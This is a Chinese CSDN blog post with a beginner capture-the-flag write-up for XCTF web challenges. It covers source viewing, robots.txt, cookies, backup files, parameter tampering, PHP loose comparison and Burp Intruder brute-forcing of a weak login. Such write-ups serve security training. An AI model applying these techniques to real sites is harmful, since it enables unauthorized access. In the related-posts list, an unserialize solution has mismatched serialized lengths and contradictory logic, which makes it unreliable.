攻防世界 WEB部分 新手关

已于 2022-11-15 23:16:36 修改
阅读量316 收藏 2
点赞数
分类专栏: 攻防世界web 文章标签: 搜索引擎
于 2022-11-15 22:30:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45746283/article/details/127874789
版权

本篇文章主要对攻防世界WEB部分的新手关进行详细讲解。

1. view_source

右键被禁用了,尝试通过F12查看网页源代码,可以发现被注释掉的flag。 

2. robots

robots协议:Robots协议用来告知搜索引擎哪些页面能被抓取,哪些页面不能被抓取,可以通过查看robots.txt文件查看协议内容。

所以此场景考虑查看robots.txt文件。

可以发现有一个disable文件,查看此php发现flag。

3. cookies

通过F12查看network。发现在cookie中有提示。

根据提示查看cookie.php文件,页面显示see http response,根据提示可以在response中找到flag。

4.backup

在日常工作中,我们常常会把备份文件加.bak后缀,因此我们尝试查看  index.php.bak 文件,发现可以下载。

下载后将.bak后缀删除,打开index.php文件即可看到flag。 

5. disabled_button

查看源代码发现button被设置为disabled。 

将此参数删除后,发现按钮此时可以点击,点击后即可发现flag。

6. get_post

GET方法:直接在后面接?a=1即可成功。

 POST方法:此处使用harkbar插件,首先使用load加载当前url,在post中附加b=2信息,点击run执行即可获得flag。

7. baby_web

初始化页面一般为index.php,使用burpsuite抓包,并修改文件为index.php,点击发送。

可以在右侧的response中看到flag为{very_baby_flag} 。

8. simple_php

查看源码,发现需要接受两个变量a,b。

其中flag1的判断条件为a==0且a不为0。可以考虑让a=0abc,因为此处“==”为宽松比较。

flag2的判断条件为b不是数字或数字字符串(否则会触发is_numeric函数)且值大于1234,考虑让b=2345a。

传递两个参数时,使用&符号进行连接。 

9. weak_auth

首先在登录页面随便输入用户名密码并使用burpsuite进行抓包。

右键点击send to intruder进行爆破。

首先选中username和password。 

点击payloads,选择需要使用的字典,此处我选择的是我本地的字典文件。

点击start attack开始爆破,可以发现用户名为admin。

继续修改intruder中的配置,开始测试密码,同样选择需要使用的payload文件开始爆破。

 可以发现密码为123456。 

回到登陆页面使用admin 123456登录,可以获得flag。 

本篇文章到此为止,后续关卡将会持续更新。

Arik0
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 baby——web writeup
m0_73605862的博客
05-07 429
Step4:将抓包得到的发送到repeater,右键点击send to repeater。然后将1.php修改为index.php ,然后点击send进行发送,得到flag。【来源】(攻防世界)https://adworld.xctf.org.cn/challenges/list。Step2:输入index.php,发现自动跳转到了1.php.Step1:查看URL再根据提示,猜测是需要找到初始页面。Step3:用burpsuite进行抓包。【题目】baby_web。【思路】查看初始页面。
攻防世界--baby_web
qq_73611185的博客
09-09 295
题目提示说想想初始页面,尝试将1.php删除直接进入网页还有更改为index.php网页都没反应仍然是1.php,没有思路了就看了wp。成为ctf全栈之路之web第九题。
CTF-WEB攻防世界题目实战解析baby_web_ctf web游戏提示
2401_84969915的博客
05-16 285
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
baby_web (攻防世界)
HackerYY的博客
11-23 2905
攻防世界baby_web 内附解题过程
攻防世界Web新手练习篇
m0_63944500的博客
11-19 2205
写给刚接触CTF的萌新,感谢支持,谨以此文献给去年的自己。
攻防世界web新手模式baby_web
2301_79442654的博客
11-26 65
发送到repeater,send得到response,发现提示flag被隐藏。把1.php改成index.php,仍然跳转到1.php。把response header打开。
Web安全攻防
06-30
考虑到部分新手朋友,我们在课程中加入了web的基础知识,帮助大家轻松入门。 本教程的特色在于理论和实践相结合,既避免介绍过多的理论知识,同时也不单纯只介绍某种工具的使用,力求使大家既能知其然又能知其...
2020-10-15-web新手区.md
01-24
攻防世界web新手
新手快速入门CTF-Web开发的一款把靶场.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
Python爬虫平台(Web端爬虫攻防刷题平台)
04-10
该平台可供新手小白练习Web端爬虫技术,再也不怕新手入门找不到合适的网站了,该平台目前有七道大题,每个题目都是独立开发Web网页,并且每道题使用到的反爬技术都是不同的,很适合新人练手,后期也会进行更新题目。...
hack the game
最新发布
06-08
一个适合新手的简单有趣的黑客小游戏,模拟黑客入侵pc获取文件,然后全身而退。动作要快,不要被抓到了哦
【愚公系列】2023年06月 攻防世界-Web(babyweb
时光隧道
06-17 4837
SSRF(Server-Side Request Forgery,服务端请求伪造)是一种安全漏洞,攻击者可以通过该漏洞向受害服务器发出伪造的请求,从而访问并获取服务器上的资源。常见的SSRF攻击场景包括访问内部网络的服务、执行本地文件系统命令、攻击外部系统等。SSRF注入漏洞是一种特殊的SSRF漏洞,攻击者通过在目标网站的URL参数中注入恶意代码,使服务器向攻击者指定的网址发起请求,从而实现攻击者的目的。例如,攻击者可以利用SSRF注入漏洞访问内部系统、窃取敏感信息、发起攻击等。
CTF-WEB攻防世界题目实战解析baby_web
2301_76565920的博客
04-21 643
题目:baby_web 难度:1。index.php,抓包,查看header
攻防世界——web新手和引导模式(全解)
热门推荐
小白一枚多多关注的博客
12-20 2万+
全新攻防世界web新手题目,小白重新归来
攻防世界-WEB进阶-ics-06(Burpsuite爆破使用)
m0_46267075的博客
05-26 4475
尝试
攻防世界-web-进阶-baby_web
weixin_31610083的博客
09-28 1662
【题目描述】 想想初始页面是哪个 【附件】 在线场景 【过程及思路】 进入在线场景,页面如下。 观察URL,当前所在页面是1.php。提示让我们去找初试页面,先想到了index.php。 尝试后发现又跳回index.php了,可能是加了自动跳转。 按F12查看一下浏览器的网络结构,发现index.php确实存在,根据它们的活动顺序也应该是自动跳转至了1.php,如下图。 究竟是不是跳转呢? 光猜是不靠谱的,我们要看一下返回包的状态:点击表头(Header)...
攻防世界 web进阶区 baby_web
m0_51395584的博客
06-15 898
攻防世界 web题 baby_web
攻防世界baby_web
知足且坚定,温柔且上进
01-23 9439
题目描述:想想初始页面是哪个 打开链接,发现跳转到了1.php 根据题目描述 初始页面,我们知道,index一般为页面默认页,我们试试index.php,还是自动跳转到1.php,这是我们F12进入开发者模式,进入网络选项卡,发现有Index.php的文件,找到flag 我试了用Burpsuite抓包同样也能做出来,注意:我把起先的1.php改成了index.php,得到 响应 Flag i...
攻防世界web新手区攻略
weixin_44638133的博客
08-10 514
请求
攻防世界web新手题unserialize3
05-05
这道题是一个 PHP 反序列化的题目。 题目描述: 提示:这次不会那么简单了,打开源代码看看? 源代码: ``` <?php error_reporting(0); highlight_file(__FILE__); class Show{ public $name; public $age; public function __construct($name,$age){ $this->name = $name; $this->age = $age; } public function __toString(){ return $this->name; } } class Flag{ public $show; public $data; public function __construct(){ $this->show = new Show('flag','0'); $this->data = file_get_contents('/flag'); } public function __destruct(){ if(preg_match('/show|flag|_|\s|\(|\)|{|}|\'|\"/i',$this->show)){ exit('hacker!'); } echo $this->show." is ".$this->data; } } if(isset($_GET['a'])){ $a = unserialize($_GET['a']); if($a instanceof Flag){ echo $a; } } ``` 分析: 首先看到这是一个传入参数进行反序列化的题目,传入参数为 $_GET['a'],并且在反序列化后判断其类型是否为 Flag,如果是则输出 $a。 在 Flag 类的构造函数中有一个 $this->data = file_get_contents('/flag'),意味着我们需要获取服务器上的 /flag 文件。 而在 Flag 类的析构函数中,会对 $this->show 变量进行正则匹配,匹配的正则表达式为 /show|flag|_|\s|\(|\)|{|}|\'|\"/i,如果匹配到就会输出 'hacker!'。这里需要注意的是,$this->show 的值是 Show 类的一个实例,而 Show 类中的 __toString() 方法返回的是 $this->name 的值。 因此,我们需要构造一个序列化后的字符串,使得在反序列化后其类型为 Flag,$this->show 的值为一个 Show 类的实例,且该实例的 $name 值满足正则表达式的匹配条件。 解法: 根据题目分析,我们需要构造一个序列化后的字符串,使得在反序列化后其类型为 Flag,$this->show 的值为一个 Show 类的实例,且该实例的 $name 值满足正则表达式的匹配条件。 我们可以通过手动构造序列化字符串来实现这个目标。首先构造一个 Show 类的实例,该实例的 $name 值为一个正则表达式的匹配条件,然后将该实例作为 Flag 类的一个属性,最后将 Flag 类序列化即可。 构造序列化字符串的代码如下: ``` <?php class Show{ public $name; public $age; public function __construct($name,$age){ $this->name = $name; $this->age = $age; } public function __toString(){ return $this->name; } } class Flag{ public $show; public $data; public function __construct(){ $this->show = new Show('/show|flag|_|\s|\(|\)|{|}|\'|\"/i','0'); $this->data = file_get_contents('/flag'); } public function __destruct(){ if(preg_match('/show|flag|_|\s|\(|\)|{|}|\'|\"/i',$this->show)){ exit('hacker!'); } echo $this->show." is ".$this->data; } } // 序列化 Flag 类 $flag = new Flag(); $ser = serialize($flag); echo urlencode($ser); ``` 将上述代码保存为文件 unserialize3.php 并上传到服务器上,然后访问 http://your-ip/unserialize3.php,得到序列化后的字符串: ``` O:4:"Flag":2:{s:4:"show";O:4:"Show":2:{s:4:"name";s:23:"/show|flag|_|\s|\(|\)|{|}|'|\i";s:3:"age";s:1:"0";}s:4:"data";s:45:"flag{3c75f8e2-6eb1-4f50-8901-8c3e0ae63a07}";} ``` 最后将序列化后的字符串作为 $_GET['a'] 的值传入即可,访问 http://your-ip/unserialize3.php?a=O%3A4%3A%22Flag%22%3A2%3A%7Bs%3A4%3A%22show%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A23%3A%22%2Fshow%7Cflag%7C_%7C%5Cs%7C%5C(%5C)%7B%7D%7C%27%7C%5C%22%5Ci%22%3Bs%3A3%3A%22age%22%3Bs%3A1%3A%220%22%3B%7Ds%3A4%3A%22data%22%3Bs%3A45%3A%22flag%7B3c75f8e2-6eb1-4f50-8901-8c3e0ae63a07%7D%22%3B%7D,即可得到 flag。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值